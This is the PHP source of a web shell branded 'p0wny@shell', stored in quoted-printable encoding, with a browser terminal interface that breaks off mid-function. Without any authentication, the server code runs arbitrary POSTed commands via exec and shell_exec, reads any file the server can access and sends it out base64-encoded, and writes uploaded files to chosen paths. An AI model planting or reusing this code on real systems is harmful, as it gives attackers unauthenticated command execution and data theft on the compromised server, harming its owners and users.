<?php

function=20expandPath($path)=20{
=20=20=20=20if=20(preg_match("#^(~[a-zA-Z0-9_.-]*)(/.*)?$#",=20$path,=20$ma=
tch))=20{
=20=20=20=20=20=20=20=20exec("echo=20$match[1]",=20$stdout);
=20=20=20=20=20=20=20=20return=20$stdout[0]=20.=20$match[2];
=20=20=20=20}
=20=20=20=20return=20$path;
}

function=20featureShell($cmd,=20$cwd)=20{
=20=20=20=20$stdout=20=3D=20array();

=20=20=20=20if=20(preg_match("/^\s*cd\s*(2>&1)?$/",=20$cmd))=20{
=20=20=20=20=20=20=20=20chdir(expandPath("~"));
=20=20=20=20}=20elseif=20(preg_match("/^\s*cd\s+(.+)\s*(2>&1)?$/",=20$cmd))=
=20{
=20=20=20=20=20=20=20=20chdir($cwd);
=20=20=20=20=20=20=20=20preg_match("/^\s*cd\s+([^\s]+)\s*(2>&1)?$/",=20$cmd=
,=20$match);
=20=20=20=20=20=20=20=20chdir(expandPath($match[1]));
=20=20=20=20}=20elseif=20(preg_match("/^\s*download\s+[^\s]+\s*(2>&1)?$/",=
=20$cmd))=20{
=20=20=20=20=20=20=20=20chdir($cwd);
=20=20=20=20=20=20=20=20preg_match("/^\s*download\s+([^\s]+)\s*(2>&1)?$/",=
=20$cmd,=20$match);
=20=20=20=20=20=20=20=20return=20featureDownload($match[1]);
=20=20=20=20}=20else=20{
=20=20=20=20=20=20=20=20chdir($cwd);
=20=20=20=20=20=20=20=20exec($cmd,=20$stdout);
=20=20=20=20}

=20=20=20=20return=20array(
=20=20=20=20=20=20=20=20"stdout"=20=3D>=20$stdout,
=20=20=20=20=20=20=20=20"cwd"=20=3D>=20getcwd()
=20=20=20=20);
}

function=20featurePwd()=20{
=20=20=20=20return=20array("cwd"=20=3D>=20getcwd());
}

function=20featureHint($fileName,=20$cwd,=20$type)=20{
=20=20=20=20chdir($cwd);
=20=20=20=20if=20($type=20=3D=3D=20'cmd')=20{
=20=20=20=20=20=20=20=20$cmd=20=3D=20"compgen=20-c=20$fileName";
=20=20=20=20}=20else=20{
=20=20=20=20=20=20=20=20$cmd=20=3D=20"compgen=20-f=20$fileName";
=20=20=20=20}
=20=20=20=20$cmd=20=3D=20"/bin/bash=20-c=20\"$cmd\"";
=20=20=20=20$files=20=3D=20explode("\n",=20shell_exec($cmd));
=20=20=20=20return=20array(
=20=20=20=20=20=20=20=20'files'=20=3D>=20$files,
=20=20=20=20);
}

function=20featureDownload($filePath)=20{
=20=20=20=20$file=20=3D=20@file_get_contents($filePath);
=20=20=20=20if=20($file=20=3D=3D=3D=20FALSE)=20{
=20=20=20=20=20=20=20=20return=20array(
=20=20=20=20=20=20=20=20=20=20=20=20'stdout'=20=3D>=20array('File=20not=20f=
ound=20/=20no=20read=20permission.'),
=20=20=20=20=20=20=20=20=20=20=20=20'cwd'=20=3D>=20getcwd()
=20=20=20=20=20=20=20=20);
=20=20=20=20}=20else=20{
=20=20=20=20=20=20=20=20return=20array(
=20=20=20=20=20=20=20=20=20=20=20=20'name'=20=3D>=20basename($filePath),
=20=20=20=20=20=20=20=20=20=20=20=20'file'=20=3D>=20base64_encode($file)
=20=20=20=20=20=20=20=20);
=20=20=20=20}
}

function=20featureUpload($path,=20$file,=20$cwd)=20{
=20=20=20=20chdir($cwd);
=20=20=20=20$f=20=3D=20@fopen($path,=20'wb');
=20=20=20=20if=20($f=20=3D=3D=3D=20FALSE)=20{
=20=20=20=20=20=20=20=20return=20array(
=20=20=20=20=20=20=20=20=20=20=20=20'stdout'=20=3D>=20array('Invalid=20path=
=20/=20no=20write=20permission.'),
=20=20=20=20=20=20=20=20=20=20=20=20'cwd'=20=3D>=20getcwd()
=20=20=20=20=20=20=20=20);
=20=20=20=20}=20else=20{
=20=20=20=20=20=20=20=20fwrite($f,=20base64_decode($file));
=20=20=20=20=20=20=20=20fclose($f);
=20=20=20=20=20=20=20=20return=20array(
=20=20=20=20=20=20=20=20=20=20=20=20'stdout'=20=3D>=20array('Done.'),
=20=20=20=20=20=20=20=20=20=20=20=20'cwd'=20=3D>=20getcwd()
=20=20=20=20=20=20=20=20);
=20=20=20=20}
}

if=20(isset($_GET["feature"]))=20{

=20=20=20=20$response=20=3D=20NULL;

=20=20=20=20switch=20($_GET["feature"])=20{
=20=20=20=20=20=20=20=20case=20"shell":
=20=20=20=20=20=20=20=20=20=20=20=20$cmd=20=3D=20$_POST['cmd'];
=20=20=20=20=20=20=20=20=20=20=20=20if=20(!preg_match('/2>/',=20$cmd))=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20$cmd=20.=3D=20'=202>&1';
=20=20=20=20=20=20=20=20=20=20=20=20}
=20=20=20=20=20=20=20=20=20=20=20=20$response=20=3D=20featureShell($cmd,=20=
$_POST["cwd"]);
=20=20=20=20=20=20=20=20=20=20=20=20break;
=20=20=20=20=20=20=20=20case=20"pwd":
=20=20=20=20=20=20=20=20=20=20=20=20$response=20=3D=20featurePwd();
=20=20=20=20=20=20=20=20=20=20=20=20break;
=20=20=20=20=20=20=20=20case=20"hint":
=20=20=20=20=20=20=20=20=20=20=20=20$response=20=3D=20featureHint($_POST['f=
ilename'],=20$_POST['cwd'],=20$_POST['type']);
=20=20=20=20=20=20=20=20=20=20=20=20break;
=20=20=20=20=20=20=20=20case=20'upload':
=20=20=20=20=20=20=20=20=20=20=20=20$response=20=3D=20featureUpload($_POST[=
'path'],=20$_POST['file'],=20$_POST['cwd']);
=20=20=20=20}

=20=20=20=20header("Content-Type:=20application/json");
=20=20=20=20echo=20json_encode($response);
=20=20=20=20die();
}

?><!DOCTYPE=20html>

<html>

=20=20=20=20<head>
=20=20=20=20=20=20=20=20<meta=20charset=3D"UTF-8"=20/>
=20=20=20=20=20=20=20=20<title>p0wny@shell:~#</title>
=20=20=20=20=20=20=20=20<meta=20name=3D"viewport"=20content=3D"width=3Ddevi=
ce-width,=20initial-scale=3D1.0"=20/>
=20=20=20=20=20=20=20=20<style>
=20=20=20=20=20=20=20=20=20=20=20=20html,=20body=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20margin:=200;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20padding:=200;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20background:=20#333;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20color:=20#eee;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20font-family:=20monospace;
=20=20=20=20=20=20=20=20=20=20=20=20}

=20=20=20=20=20=20=20=20=20=20=20=20*::-webkit-scrollbar-track=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20border-radius:=208px;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20background-color:=20#353535=
;
=20=20=20=20=20=20=20=20=20=20=20=20}

=20=20=20=20=20=20=20=20=20=20=20=20*::-webkit-scrollbar=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20width:=208px;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20height:=208px;
=20=20=20=20=20=20=20=20=20=20=20=20}

=20=20=20=20=20=20=20=20=20=20=20=20*::-webkit-scrollbar-thumb=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20border-radius:=208px;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20-webkit-box-shadow:=20inset=
=200=200=206px=20rgba(0,0,0,.3);
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20background-color:=20#bcbcbc=
;
=20=20=20=20=20=20=20=20=20=20=20=20}

=20=20=20=20=20=20=20=20=20=20=20=20#shell=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20background:=20#222;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20max-width:=20800px;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20margin:=2050px=20auto=200=
=20auto;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20box-shadow:=200=200=205px=
=20rgba(0,=200,=200,=20.3);
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20font-size:=2010pt;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20display:=20flex;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20flex-direction:=20column;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20align-items:=20stretch;
=20=20=20=20=20=20=20=20=20=20=20=20}

=20=20=20=20=20=20=20=20=20=20=20=20#shell-content=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20height:=20500px;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20overflow:=20auto;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20padding:=205px;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20white-space:=20pre-wrap;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20flex-grow:=201;
=20=20=20=20=20=20=20=20=20=20=20=20}

=20=20=20=20=20=20=20=20=20=20=20=20#shell-logo=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20font-weight:=20bold;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20color:=20#FF4180;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20text-align:=20center;
=20=20=20=20=20=20=20=20=20=20=20=20}

=20=20=20=20=20=20=20=20=20=20=20=20@media=20(max-width:=20991px)=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20#shell-logo=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20font-size:=206p=
x;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20margin:=20-25px=
=200;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20}

=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20html,=20body,=20#shell=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20height:=20100%;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20width:=20100%;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20max-width:=20no=
ne;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20}

=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20#shell=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20margin-top:=200=
;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20}
=20=20=20=20=20=20=20=20=20=20=20=20}

=20=20=20=20=20=20=20=20=20=20=20=20@media=20(max-width:=20767px)=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20#shell-input=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20flex-direction:=
=20column;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20}
=20=20=20=20=20=20=20=20=20=20=20=20}

=20=20=20=20=20=20=20=20=20=20=20=20@media=20(max-width:=20320px)=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20#shell-logo=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20font-size:=205p=
x;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20}
=20=20=20=20=20=20=20=20=20=20=20=20}

=20=20=20=20=20=20=20=20=20=20=20=20.shell-prompt=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20font-weight:=20bold;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20color:=20#75DF0B;
=20=20=20=20=20=20=20=20=20=20=20=20}

=20=20=20=20=20=20=20=20=20=20=20=20.shell-prompt=20>=20span=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20color:=20#1BC9E7;
=20=20=20=20=20=20=20=20=20=20=20=20}

=20=20=20=20=20=20=20=20=20=20=20=20#shell-input=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20display:=20flex;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20box-shadow:=200=20-1px=200=
=20rgba(0,=200,=200,=20.3);
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20border-top:=20rgba(255,=202=
55,=20255,=20.05)=20solid=201px;
=20=20=20=20=20=20=20=20=20=20=20=20}

=20=20=20=20=20=20=20=20=20=20=20=20#shell-input=20>=20label=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20flex-grow:=200;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20display:=20block;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20padding:=200=205px;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20height:=2030px;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20line-height:=2030px;
=20=20=20=20=20=20=20=20=20=20=20=20}

=20=20=20=20=20=20=20=20=20=20=20=20#shell-input=20#shell-cmd=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20height:=2030px;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20line-height:=2030px;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20border:=20none;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20background:=20transparent;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20color:=20#eee;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20font-family:=20monospace;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20font-size:=2010pt;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20width:=20100%;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20align-self:=20center;
=20=20=20=20=20=20=20=20=20=20=20=20}

=20=20=20=20=20=20=20=20=20=20=20=20#shell-input=20div=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20flex-grow:=201;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20align-items:=20stretch;
=20=20=20=20=20=20=20=20=20=20=20=20}

=20=20=20=20=20=20=20=20=20=20=20=20#shell-input=20input=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20outline:=20none;
=20=20=20=20=20=20=20=20=20=20=20=20}
=20=20=20=20=20=20=20=20</style>

=20=20=20=20=20=20=20=20<script>
=20=20=20=20=20=20=20=20=20=20=20=20var=20CWD=20=3D=20null;
=20=20=20=20=20=20=20=20=20=20=20=20var=20commandHistory=20=3D=20[];
=20=20=20=20=20=20=20=20=20=20=20=20var=20historyPosition=20=3D=200;
=20=20=20=20=20=20=20=20=20=20=20=20var=20eShellCmdInput=20=3D=20null;
=20=20=20=20=20=20=20=20=20=20=20=20var=20eShellContent=20=3D=20null;

=20=20=20=20=20=20=20=20=20=20=20=20function=20_insertCommand(command)=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20eShellContent.innerHTML=20+=
=3D=20"\n\n";
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20eShellContent.innerHTML=20+=
=3D=20'<span=20class=3D\"shell-prompt\">'=20+=20genPrompt(CWD)=20+=20'</spa=
n>=20';
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20eShellContent.innerHTML=20+=
=3D=20escapeHtml(command);
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20eShellContent.innerHTML=20+=
=3D=20"\n";
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20eShellContent.scrollTop=20=
=3D=20eShellContent.scrollHeight;
=20=20=20=20=20=20=20=20=20=20=20=20}

=20=20=20=20=20=20=20=20=20=20=20=20function=20_insertStdout(stdout)=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20eShellContent.innerHTML=20+=
=3D=20escapeHtml(stdout);
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20eShellContent.scrollTop=20=
=3D=20eShellContent.scrollHeight;
=20=20=20=20=20=20=20=20=20=20=20=20}

=20=20=20=20=20=20=20=20=20=20=20=20function=20_defer(callback)=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20setTimeout(callback,=200);
=20=20=20=20=20=20=20=20=20=20=20=20}

=20=20=20=20=20=20=20=20=20=20=20=20function=20featureShell(command)=20{

=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20_insertCommand(command);
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20if=20(/^\s*upload\s+[^\s]+\=
s*$/.test(command))=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20featureUpload(c=
ommand.match(/^\s*upload\s+([^\s]+)\s*$/)[1]);
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20}=20else=20if=20(/^\s*clear=
\s*$/.test(command))=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20//=20Backend=20=
shell=20TERM=20environment=20variable=20not=20set.=20Clear=20command=20hist=
ory=20from=20UI=20but=20keep=20in=20buffer
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20eShellContent.i=
nnerHTML=20=3D=20'';
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20}=20else=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20makeRequest("?f=
eature=3Dshell",=20{cmd:=20command,=20cwd:=20CWD},=20function=20(response)=
=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20if=
=20(response.hasOwnProperty('file'))=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=
=20=20=20featureDownload(response.name,=20response.file)
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20}=
=20else=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=
=20=20=20_insertStdout(response.stdout.join("\n"));
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=
=20=20=20updateCwd(response.cwd);
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20}
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20});
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20}
=20=20=20=20=20=20=20=20=20=20=20=20}

=20=20=20=20=20=20=20=20=20=20=20=20function=20featureHint()=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20if=20(eShellCmdInput.value.=
trim().length=20=3D=3D=3D=200)=20return;=20=20//=20field=20is=20empty=20->=
=20nothing=20to=20complete

=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20function=20_requestCallback=
(data)=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20if=20(data.file=
s.length=20<=3D=201)=20return;=20=20//=20no=20completion

=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20if=20(data.file=
s.length=20=3D=3D=3D=202)=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20if=
=20(type=20=3D=3D=3D=20'cmd')=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=
=20=20=20eShellCmdInput.value=20=3D=20data.files[0];
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20}=
=20else=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=
=20=20=20var=20currentValue=20=3D=20eShellCmdInput.value;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=
=20=20=20eShellCmdInput.value=20=3D=20currentValue.replace(/([^\s]*)$/,=20d=
ata.files[0]);
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20}
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20}=20else=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20_in=
sertCommand(eShellCmdInput.value);
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20_in=
sertStdout(data.files.join("\n"));
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20}
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20}

=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20var=20currentCmd=20=3D=20eS=
hellCmdInput.value.split("=20");
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20var=20type=20=3D=20(current=
Cmd.length=20=3D=3D=3D=201)=20?=20"cmd"=20:=20"file";
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20var=20fileName=20=3D=20(typ=
e=20=3D=3D=3D=20"cmd")=20?=20currentCmd[0]=20:=20currentCmd[currentCmd.leng=
th=20-=201];

=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20makeRequest(
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20"?feature=3Dhin=
t",
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20fil=
ename:=20fileName,
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20cwd=
:=20CWD,
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20typ=
e:=20type
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20},
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20_requestCallbac=
k
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20);

=20=20=20=20=20=20=20=20=20=20=20=20}

=20=20=20=20=20=20=20=20=20=20=20=20function=20featureDownload(name,=20file=
)=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20var=20element=20=3D=20docum=
ent.createElement('a');
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20element.setAttribute('href'=
,=20'data:application/octet-stream;base64,'=20+=20file);
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20element.setAttribute('downl=
oad',=20name);
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20element.style.display=20=3D=
=20'none';
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20document.body.appendChild(e=
lement);
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20element.click();
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20document.body.removeChild(e=
lement);
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20_insertStdout('Done.');
=20=20=20=20=20=20=20=20=20=20=20=20}

=20=20=20=20=20=20=20=20=20=20=20=20function=20featureUpload(path)=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20var=20element=20=3D=20docum=
ent.createElement('input');
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20element.setAttribute('type'=
,=20'file');
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20element.style.display=20=3D=
=20'none';
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20document.body.appendChild(e=
lement);
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20element.addEventListener('c=
hange',=20function=20()=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20var=20promise=
=20=3D=20getBase64(element.files[0]);
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20promise.then(fu=
nction=20(file)=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20mak=
eRequest('?feature=3Dupload',=20{path:=20path,=20file:=20file,=20cwd:=20CWD=
},=20function=20(response)=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=
=20=20=20_insertStdout(response.stdout.join("\n"));
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=
=20=20=20updateCwd(response.cwd);
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20});
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20},=20function=
=20()=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20_in=
sertStdout('An=20unknown=20client-side=20error=20occurred.');
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20});
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20});
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20element.click();
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20document.body.removeChild(e=
lement);
=20=20=20=20=20=20=20=20=20=20=20=20}

=20=20=20=20=20=20=20=20=20=20=20=20function=20getBase64(file,=20onLoadCall=
back)=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20return=20new=20Promise(func=
tion(resolve,=20reject)=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20var=20reader=20=
=3D=20new=20FileReader();
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20reader.onload=
=20=3D=20function()=20{=20resolve(reader.result.match(/base64,(.*)$/)[1]);=
=20};
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20reader.onerror=
=20=3D=20reject;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20reader.readAsDa=
taURL(file);
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20});
=20=20=20=20=20=20=20=20=20=20=20=20}

=20=20=20=20=20=20=20=20=20=20=20=20function=20genPrompt(cwd)=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20cwd=20=3D=20cwd=20||=20"~";
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20var=20shortCwd=20=3D=20cwd;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20if=20(cwd.split("/").length=
=20>=203)=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20var=20splittedC=
wd=20=3D=20cwd.split("/");
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20shortCwd=20=3D=
=20"=E2=80=A6/"=20+=20splittedCwd[splittedCwd.length-2]=20+=20"/"=20+=20spl=
ittedCwd[splittedCwd.length-1];
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20}
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20return=20"p0wny@shell:<span=
=20title=3D\""=20+=20cwd=20+=20"\">"=20+=20shortCwd=20+=20"</span>#";
=20=20=20=20=20=20=20=20=20=20=20=20}

=20=20=20=20=20=20=20=20=20=20=20=20function=20updateCwd(cwd)=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20if=20(cwd)=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20CWD=20=3D=20cwd=
;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20_updatePrompt()=
;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20return;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20}
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20makeRequest("?feature=3Dpwd=
",=20{},=20function(response)=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20CWD=20=3D=20res=
ponse.cwd;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20_updatePrompt()=
;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20});

=20=20=20=20=20=20=20=20=20=20=20=20}

=20=20=20=20=20=20=20=20=20=20=20=20function=20escapeHtml(string)=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20return=20string
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20.replace(/&/g,=
=20"&amp;")
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20.replace(/</g,=
=20"&lt;")
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20.replace(/>/g,=
=20"&gt;");
=20=20=20=20=20=20=20=20=20=20=20=20}

=20=20=20=20=20=20=20=20=20=20=20=20function=20_updatePrompt()=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20var=20eShellPrompt=20=3D=20=
document.getElementById("shell-prompt");
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20eShellPrompt.innerHTML=20=
=3D=20genPrompt(CWD);
=20=20=20=20=20=20=20=20=20=20=20=20}

=20=20=20=20=20=20=20=20=20=20=20=20function=20_onShellCmdKeyDown(event)=20=
{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20switch=20(event.key)=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20case=20"Enter":
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20fea=
tureShell(eShellCmdInput.value);
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20ins=
ertToHistory(eShellCmdInput.value);
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20eSh=
ellCmdInput.value=20=3D=20"";
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20bre=
ak;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20case=20"ArrowUp=
":
